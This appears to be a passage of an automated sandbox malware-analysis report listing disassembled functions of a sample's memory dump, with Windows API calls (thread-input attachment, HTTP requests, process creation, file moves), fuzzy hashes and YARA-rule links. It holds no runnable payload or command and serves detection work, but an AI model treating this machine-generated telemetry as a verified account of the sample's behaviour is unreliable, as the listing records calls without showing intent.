CoUninitialize.OLE32 ref: 00A6B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 00A6B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 00A6B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00A6B56D
CoGetObject.OLE32(?,00000000,00A9D91C,?), ref: 00A6B590
SetErrorMode.KERNEL32(00000000), ref: 00A6B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A6B623
VariantClear.OLEAUT32(00A9D91C), ref: 00A6B633

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 9696954f3f61dabf6c2a782feca157724f60765e7339d7988c6a1e7582da6c82
Instruction ID: 9fbcad3ad2361a19017829cc492b54b496c7be20af676eb4b995f99efc78f336
Opcode Fuzzy Hash: 9696954f3f61dabf6c2a782feca157724f60765e7339d7988c6a1e7582da6c82
Instruction Fuzzy Hash: A1C1F0B1618301AFD700DF68C98496ABBF9BF89304F00491DF58ADB251DB71ED86CB62

Function 00A3ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00A3ACC1

Part of subcall function 00A37CF4: __mtinitlocknum.LIBCMT ref: 00A37D06
Part of subcall function 00A37CF4: EnterCriticalSection.KERNEL32(00000000,?,00A37ADD,0000000D), ref: 00A37D1F

__calloc_crt.LIBCMT ref: 00A3ACD2

Part of subcall function 00A36986: __calloc_impl.LIBCMT ref: 00A36995
Part of subcall function 00A36986: Sleep.KERNEL32(00000000,000003BC,00A2F507,?,0000000E), ref: 00A369AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 00A3ACED
GetStartupInfoW.KERNEL32(?,00AC6E28,00000064,00A35E91,00AC6C70,00000014), ref: 00A3AD46
__calloc_crt.LIBCMT ref: 00A3AD91
GetFileType.KERNEL32(00000001), ref: 00A3ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00A3AE11

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 518e9d5b26fc3a34b05dd442eb14dc93733d8f9863d6f3fe3e1e1a38d9417e2e
Instruction ID: 3aca440ed624759e44a77542aa731fa2f867d6e4d906c3d3a2306e91f8334687
Opcode Fuzzy Hash: 518e9d5b26fc3a34b05dd442eb14dc93733d8f9863d6f3fe3e1e1a38d9417e2e
Instruction Fuzzy Hash: F981A1719053658FDB24CFA8C9406ADBBF0AF25325F24425EF4A6AB3D1C7349843CB56

Function 00A567E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00A567FD
__swprintf.LIBCMT ref: 00A5680A

Part of subcall function 00A3172B: __woutput_l.LIBCMT ref: 00A31784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00A56834
LoadResource.KERNEL32(?,00000000), ref: 00A56840
LockResource.KERNEL32(00000000), ref: 00A5684D
FindResourceW.KERNEL32(?,?,00000003), ref: 00A5686D
LoadResource.KERNEL32(?,00000000), ref: 00A5687F
SizeofResource.KERNEL32(?,00000000), ref: 00A5688E
LockResource.KERNEL32(?), ref: 00A5689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00A568F9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 1b7b79a5f775fe1e919cab43419f4462e43972b7c1a2b3db7b0246b5f2761ae7
Instruction ID: 74ce686b21771e5e6babedc4de28474ee7842736dc81bf8d84e79b9670b1eeb0
Opcode Fuzzy Hash: 1b7b79a5f775fe1e919cab43419f4462e43972b7c1a2b3db7b0246b5f2761ae7
Instruction Fuzzy Hash: 61318E71A0121AABDB10DFA1ED49EBB7BA8FF08341F408426FD02D3150EB34D956DBA0

Function 00A54025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A54047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A530A5,?,00000001), ref: 00A5405B
GetWindowThreadProcessId.USER32(00000000), ref: 00A54062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A530A5,?,00000001), ref: 00A54071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A54083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00A530A5,?,00000001), ref: 00A5409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A530A5,?,00000001), ref: 00A540AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A530A5,?,00000001), ref: 00A540F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00A530A5,?,00000001), ref: 00A54108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00A530A5,?,00000001), ref: 00A54113

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 454bd24b7c3e94a803d765412a4229f8f0f409b2b66cd41380faf919f6ef4da8
Instruction ID: f617e8255ea1e6ffc5ab43cb8e31fac1621a3876ed834637462b019444940805
Opcode Fuzzy Hash: 454bd24b7c3e94a803d765412a4229f8f0f409b2b66cd41380faf919f6ef4da8
Instruction Fuzzy Hash: 2D31E172611200AFDB10CF94DC85B6D7BB9BB5831AF108107FE05E6290DBB4DAC98B61

Function 00A8DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A2B496
SetTextColor.GDI32(?,000000FF), ref: 00A2B4A0
SetBkMode.GDI32(?,00000001), ref: 00A2B4B5
GetStockObject.GDI32(00000005), ref: 00A2B4BD
GetClientRect.USER32(?), ref: 00A8DD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 00A8DD7A
GetWindowDC.USER32(?), ref: 00A8DD86
GetPixel.GDI32(00000000,?,?), ref: 00A8DD95
ReleaseDC.USER32(?,00000000), ref: 00A8DDA7
GetSysColor.USER32(00000005), ref: 00A8DDC5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 32c3bb14650a4593afc4d2aa010321915b6f71dff0b439cab8b99172b57d488b
Instruction ID: 170d22a2f0ff97d7594132239a54dd7cbbcf783788719ce9370409341d1807fe
Opcode Fuzzy Hash: 32c3bb14650a4593afc4d2aa010321915b6f71dff0b439cab8b99172b57d488b
Instruction Fuzzy Hash: 41115E31610205FFDB21AFE4EC48FA97B71EB05325F118626FA66950E1CF314982DF20

Function 00A4CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00A4CF50), ref: 00A4CE90

Strings

TEXT, xrefs: 00A4CDC7
REGEXPCLASS, xrefs: 00A4CC56
NAME, xrefs: 00A4CCC2
CLASS, xrefs: 00A4CC10
CLASSNN, xrefs: 00A4CC33
INSTANCE, xrefs: 00A4CD9E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 1fd0aac1ee7fe38c4bc2737589ee7a0155d728bfb4a77cff9f18d09f06611ca6
Instruction ID: 23a7fc15b9e32eb411b654d5ca6412631cf4cb411791e1fc2ee1ace868dc4fa3
Opcode Fuzzy Hash: 1fd0aac1ee7fe38c4bc2737589ee7a0155d728bfb4a77cff9f18d09f06611ca6
Instruction Fuzzy Hash: CC91C634A01616ABCB58DFA4C582BEAFB75FF44310F508529E44DE7191DF30A99ACBD0

Function 00A13093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A130DC
CoUninitialize.OLE32(?,00000000), ref: 00A13181
UnregisterHotKey.USER32(?), ref: 00A132A9
DestroyWindow.USER32(?), ref: 00A85079
FreeLibrary.KERNEL32(?), ref: 00A850F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A85125

Strings

close all, xrefs: 00A130D7

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 71fd17679ffeea318ac8d80d4e3fdc581b75411e975fd8350589a61642d1b7fa
Instruction ID: 9acfffcd4c4b855f1ffb52d74945992ff2f19c4c55ad9fbebc80f53e00477596
Opcode Fuzzy Hash: 71fd17679ffeea318ac8d80d4e3fdc581b75411e975fd8350589a61642d1b7fa
Instruction Fuzzy Hash: E2912B357002129FCB15EF64C995AA8F3B4FF14304F5482A9E50AA7262DF30AE96CF54

Function 00A2CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00A2CC15

Part of subcall function 00A2CCCD: GetClientRect.USER32(?,?), ref: 00A2CCF6
Part of subcall function 00A2CCCD: GetWindowRect.USER32(?,?), ref: 00A2CD37
Part of subcall function 00A2CCCD: ScreenToClient.USER32(?,?), ref: 00A2CD5F

GetDC.USER32 ref: 00A8D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A8D14A
SelectObject.GDI32(00000000,00000000), ref: 00A8D158
SelectObject.GDI32(00000000,00000000), ref: 00A8D16D
ReleaseDC.USER32(?,00000000), ref: 00A8D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A8D200

Strings

U, xrefs: 00A8D0D5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 9fa627220ef07b3b8a9a4f2abc2b894294535899397c1e548120eeb15d2fa042
Instruction ID: 95313f034ae42f1a29d28fd3398bf2b7bbb4c0a5afc98d3a8eb4cb26f0053e49
Opcode Fuzzy Hash: 9fa627220ef07b3b8a9a4f2abc2b894294535899397c1e548120eeb15d2fa042
Instruction Fuzzy Hash: 0A71C030500205EFCF21EF68DD85AEA7BB5FF48324F14426AED5A5A2A6D7318881DB60

Function 00A7ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A2B35F

Part of subcall function 00A2B63C: GetCursorPos.USER32(000000FF), ref: 00A2B64F
Part of subcall function 00A2B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00A2B66C
Part of subcall function 00A2B63C: GetAsyncKeyState.USER32(00000001), ref: 00A2B691
Part of subcall function 00A2B63C: GetAsyncKeyState.USER32(00000002), ref: 00A2B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00A7ED3C
ImageList_EndDrag.COMCTL32 ref: 00A7ED42
ReleaseCapture.USER32 ref: 00A7ED48
SetWindowTextW.USER32(?,00000000), ref: 00A7EDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A7EE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00A7EEDC

Strings

@GUI_DROPID, xrefs: 00A7EE33
@GUI_DRAGFILE, xrefs: 00A7EE77

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: a9eef94b4e71cb39c57b65a89e87410463425510cc075dbd07f64d8015d11565
Instruction ID: b7b6d74fc093809cfddf97157e196b5a283b83d09e439b5162742fa9ef0464dc
Opcode Fuzzy Hash: a9eef94b4e71cb39c57b65a89e87410463425510cc075dbd07f64d8015d11565
Instruction Fuzzy Hash: A2519971204300AFD710DF64DD9AFAA77E4FB88714F00892EF59A972E2DB709945CB52

Function 00A645C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A645FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A6462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00A6466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A64682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A6468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00A646BF
InternetCloseHandle.WININET(00000000), ref: 00A64706

Part of subcall function 00A65052: GetLastError.KERNEL32(?,?,00A643CC,00000000,00000000,00000001), ref: 00A65067

Strings

, xrefs: 00A646B8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 02ff1bc6ff5756a064a8d6dcc6d4a37789862d1d173cf6e962005e80516c47d8
Instruction ID: aee4fca04083d939896f9ad6f31a722e1a4e9707709d14ad29ecd53ba1e7b067
Opcode Fuzzy Hash: 02ff1bc6ff5756a064a8d6dcc6d4a37789862d1d173cf6e962005e80516c47d8
Instruction Fuzzy Hash: 54417BB5601209BFEB029FA0CD89FBA7BBCEF09704F004016FA059A191DBB09D458BA4

Function 00A6B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00AADC00), ref: 00A6B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00AADC00), ref: 00A6B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A6B8C1
SysFreeString.OLEAUT32(?), ref: 00A6B8EB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 564ede53e8b2d040c08416eac8eb7d1ea178a1a5c222405f77dfd15b7f85286e
Instruction ID: fb31e016815bd84e6ec10d3913184855eaeb5db0c24e75a65f6e779d5fefae5c
Opcode Fuzzy Hash: 564ede53e8b2d040c08416eac8eb7d1ea178a1a5c222405f77dfd15b7f85286e
Instruction Fuzzy Hash: 67F12775A10219EFCB04DF94C884EAEB7B9FF49315F108459F915EB250DB31AE86CBA0

Function 00A724D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A724F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A72688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A726AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A726EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A7270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A7286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A728A1
CloseHandle.KERNEL32(?), ref: 00A728D0
CloseHandle.KERNEL32(?), ref: 00A72947

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 265a44cce685a28453cfcf4448c04c54ffb465750a9c7d7d13561d50a9b70f6b
Instruction ID: 3d67c37948897202d76150585d1cb6649d56809b70f59186a45731651aaea688
Opcode Fuzzy Hash: 265a44cce685a28453cfcf4448c04c54ffb465750a9c7d7d13561d50a9b70f6b
Instruction Fuzzy Hash: 8FD18B31604200DFCB14EF24DA91B6ABBE5BF85320F14C96DF8999B2A2DB31DC45CB52

Function 00A7B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A7B3F4

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ef743bf2458408aad558ed12a27f043f943be31720ac7ce99c8c5a0a0904dfbc
Instruction ID: b12aacd5b6dfaf02b8daafa9c60bc740e8c1c288ae3b9db3a2ae37cf131e05d3
Opcode Fuzzy Hash: ef743bf2458408aad558ed12a27f043f943be31720ac7ce99c8c5a0a0904dfbc
Instruction Fuzzy Hash: EB517FB0620214BBEF20DF68CD89BA93B74AF05314F64C122F61DDA5E2D771E9809B71

Function 00A2A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A8DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A8DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A8DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A8DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A8DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00A2A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00A8DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A8DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00A2A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00A8DBC8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 69e625c3cfcdde4b5ff46f7e2b008c5bd45180c72fd91836236465428475363b
Instruction ID: 5619dc348d13903b0fcf46f341c2415ef1b65ce639724fa7be3851d27b7d9ef0
Opcode Fuzzy Hash: 69e625c3cfcdde4b5ff46f7e2b008c5bd45180c72fd91836236465428475363b
Instruction Fuzzy Hash: A3515770600208AFDB24DF68DD85FAA7BB9BB58750F100529F946EB6D0DBB0ED81DB50

Function 00A57555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A56EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A55FA6,?), ref: 00A56ED8

Part of subcall function 00A56EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A55FA6,?), ref: 00A56EF1

Part of subcall function 00A572CB: GetFileAttributesW.KERNEL32(?,00A56019), ref: 00A572CC

lstrcmpiW.KERNEL32(?,?), ref: 00A575CA
_wcscmp.LIBCMT ref: 00A575E2
MoveFileW.KERNEL32(?,?), ref: 00A575FB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
